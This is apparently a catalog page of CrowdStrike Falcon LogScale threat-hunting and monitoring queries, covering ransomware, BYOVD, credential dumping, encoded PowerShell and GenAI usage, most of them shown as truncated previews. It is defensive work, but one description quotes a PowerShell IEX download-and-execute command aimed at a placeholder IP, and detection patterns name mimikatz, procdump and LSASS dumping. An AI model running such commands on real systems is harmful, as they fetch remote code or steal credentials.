EDR

118 queries en esta categoría

K

118 queries en EDR

Applications Spawning CMD or Powershell

Table listing processes that spawned cmd.exe or powershell.exe child processes.

"#event_simpleName" = ProcessRollup2 event_platform="Win" FileName=/(cmd.exe|powershell.exe)/i
| wildcard(field=ComputerName, pattern=?ComputerName, ignoreCase=true)
| groupBy([ParentBaseFileName], function=[count(aid, distinct=true, as="DistinctHosts")])
| sort(DistinctHosts)

EDRhuntingintermediate

Applications with plaintext passwords

Table of applications identified as potentially handling plaintext passwords.

"#event_simpleName" = ProcessRollup2 event_platform="Win" CommandLine=/REDACTED/
| wildcard(field=ComputerName, pattern=?ComputerName, ignoreCase=true)
| groupBy([FileName], function=[count(aid, distinct=true, as="Hosts")])
| sort(Hosts)

EDRhuntingintermediate

Assigned Sensor Update Policy

This query will output a table with all hosts and their sensor update logic / assigned sensor update policy.

defineTable(
    query={
        #repo="sensor_metadata" #data_source_name="policyinfo" #data_source_group="sensor-update"
        | groupBy(id, function=selectFromMax(field="@timestamp", include=[release_id]))

EDRmonitoringintermediate

BYOVD Driver Load with EDR/AV Process Termination (Medusa Ransomware)

Detects Bring Your Own Vulnerable Driver (BYOVD) attacks by correlating vulnerable kernel driver loads with security software termination on the same host. This technique has been actively used by the Medusa ransomware group to disable EDR/AV tooling before encryption. Covers both known-bad driver names and anomalous driver loads from user writable paths.

/* Phase 1 — Detect BYOVD: known-vulnerable or out-of-place signed drivers */
#event_simpleName = DriverLoad OR #event_simpleName = ClassifiedModuleLoad
| case {
    in(field=FileName, values=[

EDRhuntingintermediate

Calculate Last Windows Boot Time

Outputs the last reboot timestamp and calculates the time elapsed since then.

#event_simpleName=AgentOnline event_platform=Win  
| groupBy([aid], function=([selectLast([BaseTime])]))
| LastReboot_milli:=(BaseTime/1000*1024)+978307200
| round("LastReboot_milli")

EDRmonitoringintermediate

Charon Ransomware Detection and Correlation

The query chain detects and correlates multiple indicators of the Charon ransomware attack lifecycle, including ransomware package writes, malicious DLL sideloading, process execution triggers (notably via svchost.exe), creation of ransom notes, and suspicious service creation (WWC.sys). It merges these findings across several event types to confirm successful ransomware deployment.

defineTable(query={#event_simpleName=/Written|PeFileWritten/iF
|case{
  in(field="SHA256HashData", values=["f3c8b4986377b5a32c20fc665b0cbe0c44153369dadbcaa5e3d0e3c8545e4ba5","e0a23c0d99c45d40f6ef99c901bacf04bb12e9a3a15823b663b392abadd2444e","
5d0675f20eeb8f824097791711135a273680f77bf5e9f0e168074e97464f21b5","739e2cac9e2a15631c770236b34ba569aad1d1de87c6243f285bf1995af2cdc2"]) |rename(field="SHA256HashData", as="RansomeSHA256")|rename(field="FileName", as="RansomewareFileWritten")|Analysis:="Ransomware Package written to disk"; //5d0675f20eeb8f824097791711135a273680f77bf5e9f0e168074e97464f21b5 is not malicious

EDRhuntingintermediate

Check Domain Controller for NSX Driver

This query helps to determine if NSX drivers are installed on Domain Controllers to investigate limited Identity Protection functionality.

event_platform=/Win/i #event_simpleName=/DriverLoad/i 
| in(field=FileName,values=["vnetwfp.sys", "vnetflt.sys"],ignoreCase=true) 
| join({$falcon/investigate:aid_master()}, field=aid, key=aid, include=[ProductType]) 
| ProductType=2

EDRmonitoringintermediate

Chromium-Based Browser Hunting via DLL Load

This query identifies Chromium-based browsers by detecting the loading of chrome.dll into running processes. Unlike simple process name checks, this method helps uncover browsers that may not be named chrome.exe but still rely on Chromium components. The query excludes known chrome.exe processes to highlight less obvious Chromium-based browsers, although it’s important to note that not all Chromium-based browsers necessarily load chrome.dll.

defineTable(query={#event_simpleName=ClassifiedModuleLoad
| ImageFileName=/chrome\.dll/i
| TargetImageFileName!=/chrome\.exe/i}, include=[ComputerName, TargetProcessId], name="DllLoads")
| #event_simpleName=ProcessRollup2 TargetProcessId=*

EDRhuntingintermediate

Connections to Tor Exit Nodes

Detects network connections to or from known Tor exit nodes by matching endpoint telemetry against a curated lookup file of Tor exit node IPs.

#event_simpleName=NetworkConnectIP4
| match(file="tor-exit-nodes.csv", field=RemoteAddressIP4, column=ip, strict=true)
| groupBy(
    [aid, ComputerName],

EDRhuntingintermediate

Count Windows Discovery Commands

This query counts the execution of discovery / reconnaissance commands.

// Insert Discovery commands of interest here
event_platform=Win #event_simpleName=ProcessRollup2 FileName=/(whoami|ping|net1?|systeminfo|quser|ipconfig)/iF

// Restrict to non-system UserSid Values

EDRhuntingintermediate

Created Local User Accounts

Table of all created local user accounts including UserName, ComputerName, aid, aip, and LocalIP.

#event_simpleName=UserAccountCreated
| table([@timestamp, UserName, aid, aip, ComputerName, event_platform, LocalIP, name], limit=20000)
| sort(@timestamp)

EDRmonitoringintermediate

Credential Dumping Detection

This query detects potential credential dumping activities by monitoring process access to LSASS and suspicious memory operations.

#event_simpleName=ProcessRollup2 
| (CommandLine=/mimikatz|procdump|lsass|sekurlsa/i OR ImageFileName=/\\(mimikatz|procdump|pwdump)\.exe$/i)
| ParentImageFileName!=/\\(powershell|cmd)\.exe$/i
| join({#event_simpleName=UserIdentity}, field=AuthenticationID, include=[UserName])

EDRhuntingintermediate

CVE-2025-1146 - System Scoping using aid_master

The query below will look for Linux systems (Linux, K8, Containers) that need to be updated against CVE-2025-1146. The query is based on the lookup file aid_master_main.csv which is automatically updated every 4 hours.

/* 

The query below will look for Linux systems (Linux, K8, Containers) that need to be updated against CVE-2025-1146.

EDRmonitoringintermediate

CVE-2025-1146 - System Scoping using OsVersionInfo & Logon Data

The query below will look for Linux systems (Linux, K8, Containers) that need to be updated against CVE-2025-1146. The query is based on the event OsVersionInfo which is generated every 24-hours, at sensor start, or at sensor update. It attempts to merge in LogonType 2 and 10 to determine the last logged on user.

/* 

The query below will look for Linux systems (Linux, K8, Containers) that need to be updated against CVE-2025-1146.

EDRmonitoringintermediate

CVE-2025-1146 - System Scoping using OsVersionInfo

/* 

The query below will look for Linux systems (Linux, K8, Containers) that need to be updated against CVE-2025-1146.

EDRmonitoringintermediate

CVE-2025-53770 - SharePoint ToolShell

WebShell Discovery from w3wp.exe

// CVE-2025-53770 - WebShell Discovery from w3wp.exe

correlate(
    cmd: {

EDRdetectionintermediate

CVE-2025-59287 vulnerable WSUS servers identification

This query identifies WSUS servers that have the wsusservice enabled and that are vulnerable to CVE-2025-59287

// Make table that contains Agent ID values of Windows systems with WSUS service discovered
| defineTable(query={
  #repo = "base_sensor" event_platform=Win #event_simpleName="ProcessRollup2" FileName="wsusservice.exe"
  | groupBy([aid], function=[]

EDRhuntingmonitoringintermediate

CVE-2025-59287 - WSUS Identification+Vulnerability Query

The query below outputs a list of your Windows servers with a Falcon sensor, tells you if they need to be patched for the CVE or not, when the data was last updated, and if WSUS was "detected". https://www.reddit.com/r/crowdstrike/comments/1ohdzpm/comment/nlnti7p/

// Make a bad attempt to locate WSUS-involved devices
| defineTable(query={
  #repo = "base_sensor" #event_simpleName="ProcessRollup2" and "WSUS"
  | groupBy([ComputerName])

EDRdetectionintermediate

Decode SignInfoFlags

The query decodes SignInfoFlags from Windows process events to identify signature details and highlight unsigned or improperly signed executables.

#event_simpleName=ProcessRollup2 UserSid=/^S-1-5-21-/ SignInfoFlags=*
| bitfield:extractFlags(
 field=SignInfoFlags,
  output=[

EDRhuntingintermediate

Decode VolumeDeviceCharacteristics Bitmask

The query decodes the VolumeDeviceCharacteristics bitfield to reveal device properties such as removable media, network drives, virtual volumes, or portable devices.

| bitfield:extractFlags(
 field=VolumeDeviceCharacteristics,
  output=[
    [0,FILE_REMOVABLE_MEDIA],

EDRhuntingintermediate

Deleted Local User Accounts

Table of all deleted local user accounts including UserName, ComputerName, aid, aip, and LocalIP.

#event_simpleName=UserAccountDeleted
| groupBy([UserName, aid, aip, ComputerName, event_platform, LocalIP, name], function=selectLast([@timestamp]))
| table([@timestamp, UserName, ComputerName, aid, aip, event_platform, LocalIP, name])
| sort(@timestamp)

EDRmonitoringintermediate

Detect and Decode Base64-Encoded PowerShell Commands - http

The query identifies Windows PowerShell executions using encoded commands, extracts and decodes Base64 payloads (including nested encodings), counts occurrences and unique hosts, and outputs decoded command content for analysis of potentially obfuscated activity.

#event_simpleName=ProcessRollup2 event_platform=Win ImageFileName=/.*\\powershell\.exe/
| CommandLine=/.*\s+\-(e|encoded|encodedcommand|enc)\s+.*/
| length("CommandLine", as="cmdLength")
| groupby([CommandLine], function=stats([count(aid, distinct=true, as="uniqueEndpointCount"), count(aid, as="executionCount")]), limit=max)

EDRhuntingintermediate

Detect and Decode Base64-Encoded PowerShell Commands

#event_simpleName=ProcessRollup2 event_platform=Win ImageFileName=/.*\\powershell\.exe/
| CommandLine=/\s+\-(e|encoded|encodedcommand|enc)\s+/i
| CommandLine=/\-(?<psEncFlag>(e|encoded|encodedcommand|enc))\s+/i
| length("CommandLine", as="cmdLength")

EDRhuntingintermediate

Detect Critical Environment Variable Changes over SSH with Connection Details

The query identifies critical changes to critical environment variables, extracts connection details such as user, local and remote IPs and ports, and provides a direct link to the related process in Falcon Process Explorer.

#event_simpleName=CriticalEnvironmentVariableChanged
| EnvironmentVariableName =/(SSH_CONNECTION|USER)/
| EnvironmentVariableValue=/(?<localIP>\d+\.\d+\.\d+\.\d+)\s+(?<localPort>\d+)\s+(?<remoteIP>\d+\.\d+\.\d+\.\d+)\s+(?<remotePort>\d+)$/i
| table([@timestamp, aid, userName, remoteIP, remotePort, localIP, localPort])

EDRhuntingintermediate

Detect Data Exfiltration via external storage devices

This query shows unusual activity involving external storage devices, such as large file copy operations, bulk transfers to physical external media. While USB devices are common for legitimate use, adversaries may exploit them to exfiltrate confidential data outside normal monitoring channels. Such activity is especially concerning in restricted environments, as it bypasses network-based detection controls and can indicate insider threat or physical compromise.

#event_simpleName=/FileWritten/i and IsOnRemovableDisk = 1
| VolumeSessionUUID=*
| "Size (MB)" := Size/1024/1024
| format(format="%.2f", field=["Size (MB)"], as="Size (MB)")

EDRhuntingintermediate

Detect locally disabled RTR

This query identifies hosts with locally disabled RTR.

#event_simpleName=SensorHeartbeat
| groupBy([aid], function=selectLast([@timestamp, ComputerName, SensorStateBitMap]), limit=max)
| bitfield:extractFlags(
field=SensorStateBitMap,

EDRmonitoringintermediate

Detect NTLMv1 Authentications (Windows Event Logs)

This query detects NTLM v1 authentications using Windows Event Log telemetry.

| windows.EventData.AuthenticationPackageName=NTLM
| windows.EventData.LmPackageName!= "NTLM V2" 
| groupBy([windows.EventData.WorkstationName, user.target.name, windows.EventData.KeyLength])
| rename(field="windows.EventData.WorkstationName", as="Hostname")

EDRhuntingintermediate

Detect RTR High Risk Commands

Detects the execution of high risk commands such as - get - put - memdump - xmemdump - run - put-and-run

// Get UI Audit Events
#repo="detections" ExternalApiType=/Remote/

// Check commands for "get", "put", "memdump", "xmemdump", "run", "put-and-run"

EDRmonitoringintermediate

Detect Suspicious Windows Command-Line Activity Using System Utilities

The query analyzes Windows ProcessRollup2 events to identify unusual use of common administrative tools (e.g., net.exe, sc.exe, nltest.exe, systeminfo.exe). It assigns behavior weights based on command-line patterns, aggregates activity per host and hour, flags systems with high or frequent activity, and provides direct links for host investigation in Falcon.

// Get all Windows ProcessRollup2 Events
#event_simpleName=ProcessRollup2 event_platform=Win
// Narrow to processes of interest and create FileName variable
| ImageFileName=/\\(?<FileName>(whoami|net1?|systeminfo|ping|nltest|sc|hostname|ipconfig)\.exe)/i

EDRhuntingintermediate

Detection of DNS Requests to AI-Related Domains

This query identifies DNS requests to domains listed in the AI-Domains.csv lookup. It filters out browser-initiated traffic from Chrome and Edge. The result highlights which hosts and processes are generating the most DNS requests to those domains.

#event_simpleName=DnsRequest event_platform=Win
| match(file="generative-ai-domains.csv", field=[DomainName],column=domain,ignoreCase=true,mode=glob)
| !in(field=ContextBaseFileName, values=[msedge.exe,chrome.exe],ignoreCase=true)
| SourceProcess := ContextBaseFileName

EDRhuntingintermediate

Detection of External Direct IP Usage in CommandLine Windows and Mac

Detection of External Direct IP Usage This query detects Windows processes that utilize raw public IP addresses within HTTP/HTTPS URLs in their command-line arguments (e.g., powershell -c IEX(New-Object Net.WebClient).DownloadString('http://1.2.3.4/payload')). This behavior is highly suspicious because legitimate software typically uses domain names (DNS). Attackers often use direct public IPs to host second-stage payloads or C2 servers to bypass DNS filtering and logging mechanisms.

in(#event_simpleName, values=["ProcessRollup2","SyntheticProcessRollup2"])
| CommandLine=*http* event_platform!="Lin"
// Basline to exclude legitimate process 
//| !in(field="ParentBaseFileName", values=//["UmbrellaDiagnostic.exe","HPClickExe","Eagle" ,"HPClick.exe"])

EDRhuntingdetectionintermediate

Detection of Generic User Account Usage

This query identifies the use of generic or shared user accounts by leveraging a predefined lookup file containing known default and non-personalized usernames (e.g., admin, test, root).

"#event_simpleName" = UserLogon | user.name := lower("user.name") | groupBy(user.name,ComputerName) | match(file="generic-usernames.csv", field=[user.name], column=[username])
| table([user.name, ComputerName, _count])
| User := rename(user.name)
| Host := rename(ComputerName)

EDRdetectionintermediate

Devices in RFM state

#event_simpleName=OsVersionInfo
| groupBy([aid, ComputerNam, RFMState], function=selectLast([@timestamp]))
| RFMState = 1

EDRmonitoringintermediate

Dll-Side Loading Detection Query

The query traces processes that write both DLL and EXE files to the same location while exhibiting masquerading behavior.

//Tracing the ProcessId of a Process / File which is writting atleast 1 each EXE and DLL to same Path, Doing the Process Original name masquarading and atleast 1 File Author name is Microsoft in "DLL-Filewrite", tracking throughtout as SusProcessID
defineTable(query={#event_simpleName=/(PeFileWritten)/iF 
|lowercase("FileName")
|lowercase("OriginalFilename")

EDRhuntingintermediate

DNS Resolutions from Browser Processes

This query correlates web browser process executions with their DNS queries to identify which domains were resolved by browser processes on specific endpoints

// Get all process execution and DNS events on Windows
(#event_simpleName=ProcessRollup2 OR #event_simpleName=DnsRequest) event_platform=Win
| ComputerName=~wildcard(?ComputerName, ignoreCase=true)
// Normalize file name value across both events

EDRhuntingintermediate

DNS Staging Detection: ClickFix-Inspired nslookup Execution

Detects nslookup activity used for DNS-based staging, specifically targeting the pattern of querying external nameservers to retrieve and execute malicious payloads, as seen in recent ClickFix attacks. This hunt is highly valuable as it identifies a shift away from heavily-monitored tools like mshta and PowerShell toward abusing trusted network utilities to bypass standard firewalls and blend with legitimate DNS traffic.

// Start with process execution events for performance
#event_simpleName = ProcessRollup2
// Filter for nslookup.exe
| ImageFileName = /\\nslookup\.exe$/i

EDRhuntingdetectionintermediate

Domain Controllers with high load

Domain controllers with either average CPU usage, average RAM usage that exceeds 80% or Available Disk space < 10GB. This indicates low capacity or unexpected excessive usage.

//Table to list DC hardware capacity
| defineTable(query={#repo=base_sensor #event_simpleName="SystemCapacity"
| in(field=cid, values=[?SelectedCid])
| match(file="aid_master_main.csv", field=[cid, aid])

EDRmonitoringintermediate

Enriched Process Tree Association Events

The query filters for AssociateTreeIdWithRoot events, joins them with detection-pattern metadata from a CSV file, and outputs key fields like timestamp, host, pattern details and severity for analysis. In short, it enriches process-tree association events with contextual detection information.

#event_simpleName=AssociateTreeIdWithRoot
| PatternId =~ match(file="falcon/investigate/detect_patterns.csv", column=PatternId, strict=false)
| select([@timestamp, aid, ComputerName, PatternId,name,scenario,scenarioFriendly,description,severity,show_in_ui,killchain_stage,tactic,technique,objective,pattern_updated])

EDRdetectionintermediate

Enumerate Windows Driver Loads

The query combines DriverLoad and Event_ModuleSummaryInfoEvent data to associate loaded driver hashes with their certificate details, simplifying file paths and aggregating filenames, subjects, and issuers for analysis of driver authenticity.

// Get all DriverLoad events and Event_ModuleSummaryInfoEvent events so certificate data can be merged in
(#event_simpleName=DriverLoad event_platform=Win) OR (#repo=detections ExternalApiType=Event_ModuleSummaryInfoEvent )
// Shorten file path from DriverLoad event
| case{

EDRhuntingintermediate

Evaluate Operating System Prevalence

This query counts how many Windows endpoints are running each OS version (like Windows 10, Windows 11, etc.) in your CrowdStrike environment. It groups endpoints by their current OS product name and returns the count for each version.

#event_simpleName=OsVersionInfo event_platform=Win
| groupby(aid, function=selectLast([ProductName]))
| groupBy([ProductName], function=stats([count(aid, as="endpointCount")]))

EDRmonitoringintermediate

Exploitable Critical Vulnerabilities

Shows Critical CVEs that are considered exploitable (based on ExploitStatusEnum > 30). Results are aggregated by CVE and exploitability state, including the number of affected hosts.

#event_simpleName=FEMVulnerabilityMutation
| FEMVulnerabilityMutation.VulnerabilityInstance.Cve.Severity = Critical
| FEMVulnerabilityMutation.VulnerabilityInstance.Cve.ExploitStatusEnum > 30
| groupBy([FEMVulnerabilityMutation.VulnerabilityInstance.Cve.Id, FEMVulnerabilityMutation.VulnerabilityInstance.Cve.Severity,FEMVulnerabilityMutation.VulnerabilityInstance.Cve.ExploitStatus],function=count(FEMVulnerabilityMutation.VulnerabilityInstance.HostInfo.Hostname))

EDRmonitoringintermediate

External Connectons with Process

#event_simpleName=NetworkConnectIP4 aid=?aid ComputerName=?Computername RemoteAddressIP4=?RemoteIP 
| !cidr(RemoteAddressIP4, subnet=["10.0.0.0/8","192.168.0.0/16","172.16.0.0/12","127.0.0.0/8"])
| join({#event_simpleName=ProcessRollup2  FileName=?Processname }, field=[ContextProcessId],key=TargetProcessId, include=[FileName, UserName,ImageFileName, RemoteAddressIP4, RemotePort,CommandLine], mode=left)
| groupBy(UserName, function=collect([FileName, UserName, ImageFileName, RemoteIP, RPort, CommandLine]))

EDRhuntingintermediate

Failed and Successful User Logon Events

This query correlates successful and failed logon attempts per user account to identify potential compromise patterns, focusing on accounts with 4+ failed logons. It provides a comprehensive view of each user's authentication activity including password age and last successful access.

#event_simpleName=/UserLogon/
| case{
    #event_simpleName=UserLogon | SuccessLogonTime:=ContextTimeStamp;
    #event_simpleName=UserLogonFailed2 | FailedLogonTime:=ContextTimeStamp;

EDRmonitoringintermediate

Failed logon attempt group by userName and unique Endpoint involved

#event_simpleName = UserLogonFailed
| groupBy(UserName, function=([count(timestamp, distinct=true, as=uniqueFailedLogons), (count(aid, distinct=true, as=uniqueEP)), collect(fields = [ComputerName, aid], limit =10000)]))
| default(field = "UserName", value="-", replaceEmpty=true)
| uniqueFailedLogons >= 5

EDRhuntingintermediate

Failed User Logon Thresholding

This query identifies Windows failed login attempts that exceed a threshold (5+ failures), helping detect potential brute force attacks or account compromise attempts

// Get Windows UserLogonFailed events
event_platform=Win #event_simpleName=UserLogonFailed2

// This line is completely optional, but converts SubStatus to hex

EDRdetectionintermediate

Falcon Sensor Heartbeat Timechart

This query plots a timechart showing the frequency of Falcon sensor heartbeat events across the environment.

#event_simpleName=SensorHeartbeat
| timeChart(span=30min, function=count(as=SensorHeartbeat))

EDRmonitoringintermediate

Falcon Sensor Support Status

This query lists all active falcon sensors including their release date and support end date.

#repo=sensor_metadata #data_source_name=aidmaster #data_source_group=aidmaster-api
| groupBy([aid], function=([selectFromMax(field="@timestamp", include=[ComputerName, Time, Version, ConfigIDBuild, AgentVersion])]))
| match(file="falcon/helper/sensors_support_info.csv", field=ConfigIDBuild, column=BUILD, ignoreCase=true, strict=true)
| parseTimestamp("M/d/yy",field=SUPPORT_ENDS, as=SUPPORT_ENDS_EPOCH, timezone="UTC")

EDRmonitoringintermediate

Falcon Sensor Version Drift Monitoring (Linux)

Compares CrowdStrike Falcon sensor major/minor versions (x.xx) over time for each host. The query detects version changes, classifies them as upgrades or downgrades, and outputs the timestamp of the change along with the previous and current version values.

defineTable(query={"#event_simpleName" = OsVersionInfo AgentVersion=*
| groupBy([aid,ComputerName,AgentVersion],function=min("@timestamp"))
}, include=[aid,ComputerName,AgentVersion,_min], name="time")
| defineTable(query={"#event_simpleName" = OsVersionInfo AgentVersion=*

EDRmonitoringintermediate

Falcon Sensor Version Drift Monitoring (MacOS)

defineTable(query={"#event_simpleName" = OsVersionInfo AgentVersion=*
| groupBy([aid,ComputerName,AgentVersion],function=min("@timestamp"))
}, include=[aid,ComputerName,AgentVersion,_min], name="time")
| defineTable(query={"#event_simpleName" = OsVersionInfo AgentVersion=*

EDRmonitoringintermediate

Falcon Sensor Version Drift Monitoring (Windows)

defineTable(query={"#event_simpleName" = OsVersionInfo AgentVersion=*
| groupBy([aid,ComputerName,AgentVersion],function=min("@timestamp"))
}, include=[aid,ComputerName,AgentVersion,_min], name="time")
| defineTable(query={"#event_simpleName" = OsVersionInfo AgentVersion=*

EDRmonitoringintermediate

File Write Events with Human-Readable File Sizes

The query lists file write events and converts the file size into readable units (KB, MB, GB, or TB), displaying timestamps, host details, filenames, and both raw and formatted file sizes.

#event_simpleName=/FileWritten$/ 
| case {
    Size>=1099511627776 | CommonSize:=unit:convert(Size, to=T) | format("%,.2f TB",field=["CommonSize"], as="CommonSize");
    Size>=1073741824 | CommonSize:=unit:convert(Size, to=G) | format("%,.2f GB",field=["CommonSize"], as="CommonSize");

EDRhuntingintermediate

Files Written to Removable Media

This query tracks files written to removable media (USB drives, external drives) across all platforms, aggregating the total data volume and file count per computer. It's useful for detecting potential data exfiltration attempts or monitoring removable media usage for compliance.

#event_simpleName=/Written/ IsOnRemovableDisk=1 
| FileSizeMB:=unit:convert(Size, to=M) 
| groupBy([ComputerName], function=([sum(Size, as=SizeBytes), sum(FileSizeMB, as=FileSizeMB), count(TargetFileName, as="File Count"), collect([TargetFileName])]))

EDRhuntingintermediate

Find events that are scheduled

#event_simpleName=ScheduledTaskRegistered
| parseXml(TaskXml)
| Trigger:=rename(Task.Triggers.CalendarTrigger.Enabled)
| Trigger=* // Remove this line if you don't care if it's empty

EDRhuntingintermediate

Find events triggered at a specific time

#event_simpleName=ScheduledTaskRegistered
| parseXml(TaskXml)
| Trigger:=rename(Task.Triggers.TimeTrigger.Enabled)
| Trigger=* // Remove this line if you don't care if it's empty

EDRhuntingintermediate

Find events triggered at logon

#event_simpleName=ScheduledTaskRegistered
| parseXml(TaskXml)
| Trigger:=rename(Task.Triggers.LogonTrigger.Enabled)
| Trigger=* // Remove this line if you don't care if it's empty

EDRhuntingintermediate

Find events triggered at startup

#event_simpleName=ScheduledTaskRegistered
| parseXml(TaskXml)
| Trigger:=rename(Task.Triggers.BootTrigger.Enabled)
| Trigger=* // Remove this line if you don't care if it's empty

EDRhuntingintermediate

Find events triggered on an event

#event_simpleName=ScheduledTaskRegistered
| parseXml(TaskXml)
| Trigger:=rename(Task.Triggers.EventTrigger.Enabled)
| Trigger=* // Remove this line if you don't care if it's empty

EDRhuntingintermediate

Find hidden scheduled tasks

#event_simpleName=ScheduledTaskRegistered
| parseXml(TaskXml)
| Hidden:=rename(Task.Settings.Hidden)
| Hidden=/true/i

EDRhuntingintermediate

Find OpenClaw on Endpoints

Identifies the installation, configuration, and execution of the OpenClaw (Moltbot/Clawdbot) autonomous AI agent. OpenClaw poses a significant risk for shadow AI and data exfiltration as it requires extensive permissions (Shell, APIs, Local Files) and is often controlled via messaging apps like WhatsApp or Telegram.

#repo="base_sensor"
| #event_simpleName =~ in(values=["*ProcessRollup2", "*FileWritten"])
| case {
  // Look for the curl install method

EDRhuntingintermediate

Find processes that only ran a few of times on a specific host

#event_simpleName=ProcessRollup2 OR #event_simpleName=SyntheticProcessRollup2
| aid=?aid
| groupBy([SHA256HashData, ImageFileName], limit=max)
| _count <5

EDRhuntingintermediate

Find tasks scheduled by logon type

#event_simpleName=ScheduledTaskRegistered
| parseXml(TaskXml)
| LogonType:=rename(Task.Principals.Principal.LogonType)
| LogonType=* // Remove this line if you don't care if it's empty

EDRhuntingintermediate

Find tasks scheduled by run level

#event_simpleName=ScheduledTaskRegistered
| parseXml(TaskXml)
| RunLevel:=rename(Task.Principals.Principal.RunLevel)
| RunLevel=* // Remove this line if you don't care if it's empty

EDRhuntingintermediate

Find tasks scheduled by user ID

#event_simpleName=ScheduledTaskRegistered
| parseXml(TaskXml)
| UserId:=rename(Task.Principals.Principal.UserId)
| table([aid, UserId, TaskXml], limit=1000)

EDRhuntingintermediate

Find tasks scheduled with ComHandler

#event_simpleName=ScheduledTaskRegistered
| parseXml(TaskXml)
| ComHandlerData:=rename(Task.Actions.ComHandler.Data)
| ComHandlerData=* // Remove this line if you don't care if it's empty

EDRhuntingintermediate

Firewall Rule Additions

This query correlates processes with Windows Firewall rule modifications they triggered, identifying which executables are creating or modifying firewall rules.

#event_simpleName=ProcessRollup2
| join({#event_simpleName=FirewallSetRule}, key=ContextProcessId, field=TargetProcessId, include=[FirewallRule, FirewallRuleId])
| ImageFileName=/.*\\(?<fileName>.*\..*)/
| table([aid, UserSid, fileName, FirewallRuleId, FirewallRule, ImageFileName, CommandLine])

EDRhuntingintermediate

Frequency Analysis via Program Clustering

This query detects potential reconnaissance or lateral movement activity by identifying Windows endpoints where three or more distinct discovery/enumeration tools were executed within 10-minute windows

// Get file names of interest
event_platform=Win #event_simpleName=ProcessRollup2 FileName=/(whoami|arp|cmd|net|net1|ipconfig|route|netstat|nslookup|nltest|systeminfo|wmic|tasklist|tracert|ping|adfind|nbtstat|find|ldifde|netsh|wbadmin)\.exe/i

// Aggregate in 10 minute buckets; set search to 24 hours

EDRhuntingintermediate

GenAI Usage

This query identifies DNS requests to GenAI services.

#event_simpleName=DnsRequest
| in(field=DomainName, values=[".ai", ".ai21.com", ".aleph-alpha.com", ".anthropic.com", ".assemblyai.com", ".bolt.ai", ".bubble.io", ".character.ai", ".claude.ai", ".clickup.com", ".codeium.com", ".cohere.ai", ".copy.ai", ".cursor.so", ".deepmind.com", ".deepseek.ai", ".deepl.com", ".dalle.ai", ".elevenlabs.io", ".feedhive.io", ".forefront.ai", ".grok.x.ai", ".gpt3.com", ".huggingface.co", ".inflection.ai", ".jasper.ai", ".llama.ai", ".looka.com", ".lovable.ai", ".midjourney.com", ".mistral.ai", ".openai.com", ".opus.ai", ".perplexity.ai", ".pi.ai", ".poe.com", ".replicate.com", ".runwayml.com", ".rytr.me", ".scale.com", ".stability.ai", ".sudowrite.com", ".synthesia.io", ".tabnine.com", ".together.ai", ".v0.dev", ".vercel.ai", ".vista.social", ".wordtune.com", ".writesonic.com", ".x.ai", ".you.com", "ai21.com", "aleph-alpha.com", "anthropic.com", "api.anthropic.com", "api.openai.com", "assemblyai.com", "bard.google.com", "bedrock.aws.amazon.com", "bolt.ai", "bubble.io", "character.ai", "chat.openai.com", "chatgpt.com", "claude.ai", "clickup.com", "codeium.com", "cohere.ai", "console.anthropic.com", "copilot.github.com", "copilot.microsoft.com", "copy.ai", "cursor.so", "dalle.ai", "deepmind.com", "deepseek.ai", "deepl.com", "elevenlabs.io", "ernie.baidu.com", "feedhive.io", "forefront.ai", "gemini.google.com", "gigachat.sberbank.ru", "grok.x.ai", "gpt3.com", "huggingface.co", "inflection.ai", "jasper.ai", "labs.perplexity.ai", "llama.ai", "looka.com", "lovable.ai", "midjourney.com", "mistral.ai", "openai.com", "opus.ai", "perplexity.ai", "pi.ai", "platform.openai.com", "poe.com", "replicate.com", "runwayml.com", "rytr.me", "scale.com", "stability.ai", "sudowrite.com", "synthesia.io", "tabnine.com", "together.ai", "v0.dev", "vercel.ai", "vista.social", "wordtune.com", "writesonic.com", "x.ai", "you.com"])
| groupBy([DomainName, ComputerName, event_platform])
| sort(field=_count,type=number,order=desc)

EDRhuntingintermediate

Get Host Zero Trust Assessment Scores

This query outputs a table with hosts including their zero trust scores

event_type=ZeroTrustHostAssessment
| groupBy([aid], function=([selectFromMax(field="@timestamp", include=[scores.os, scores.sensor, scores.overall])]))
| join(query={#data_source_name=aidmaster }, field=[aid], include=[ComputerName, event_platform])

EDRmonitoringintermediate

Get USB Devices

Retrieving a list of USB Devices plugged to the device

#event_simpleName=DcUsbDeviceConnected
| DeviceTimeStamp :=parseTimeStamp(field=DeviceTimeStamp,format=seconds)
| "Time Inserted" := formatTime("%Y-%m-%dT%H:%M:%S.%L", field=DeviceTimeStamp,timezone="Zulu")
| rename([[ComputerName,"Host Name"],[DevicePropertyClassName,"Connection Type"],[DeviceManufacturer,Manufacturer],[DeviceProduct,"Product Name"], [DevicePropertyDeviceDescription,Description], [DevicePropertyClassGuid,GUID],[DeviceInstanceId,"Device ID"]])

EDRmonitoringintermediate

Hunt for a file name

#event_simpleName=ProcessRollup2 OR #event_simpleName=SyntheticProcessRollup2
| aid=?aid
| ImageFileName like ?ImageFileName
| ImageFileName=/(\/|\\)(?<FileName>\w*\.?\w*)$/

EDRhuntingintermediate

Hunt for specific Command Line Activity

#event_simpleName=ProcessRollup2 OR #event_simpleName=SyntheticProcessRollup2
| aid=?aid
| CommandLine like ?CommandLine
| ImageFileName=/(\/|\\)(?<FileName>\w*\.?\w*)$/

EDRhuntingintermediate

Hunting Bitsadmin usage

This query implements a multi-hypothesis threat hunting workflow to detect abuse of the Windows Background Intelligent Transfer Service (BITS). It uses a case statement to classify incoming telemetry into four distinct detection hypotheses.

| case {
    #event_simpleName=ProcessRollup2
    AND (ImageFileName=/\\bitsadmin\.exe$/i OR OriginalFilename="bitsadmin.exe")
    AND (

EDRhuntingintermediate

Hunting EDR Freeze

Based on the default command line switching behavior found in the EDR-Freeze open source project: https://github.com/TwoSevenOneT/EDR-Freeze?tab=readme-ov-file

// Look for process handles opening Falcon
#event_simpleName=FalconProcessHandleOpDetectInfo FileName="WerFaultSecure.exe"

// Check for command line switching signal

EDRhuntingintermediate

Identify Linux Systems Vulnerable to CVE-2025-1146 with Last Logged-On User Information

// Get OsVersionInfo events; sent by sensor every 24-hours or at sensor start or update
#event_simpleName=OsVersionInfo
 
// Narrow search to only include Linux, Container, and K8 systems

EDRdetectionintermediate

Identify Shadow SaaS

This query identifies SaaS services supported by Falcon Shield and helps detect which SaaS products are actively used within the environment.

#event_simpleName=DnsRequest DomainName=*
| match(file="shadow-saas.csv", field=[DomainName], column=[Domains], strict=true,mode=glob)
| Category=?Category
| Vendor=?Vendor

EDRmonitoringintermediate

Installed Browser Extensions (Aggregate by Extension)

This query will output a table with all installed browser extensions.

// Get browser extension event
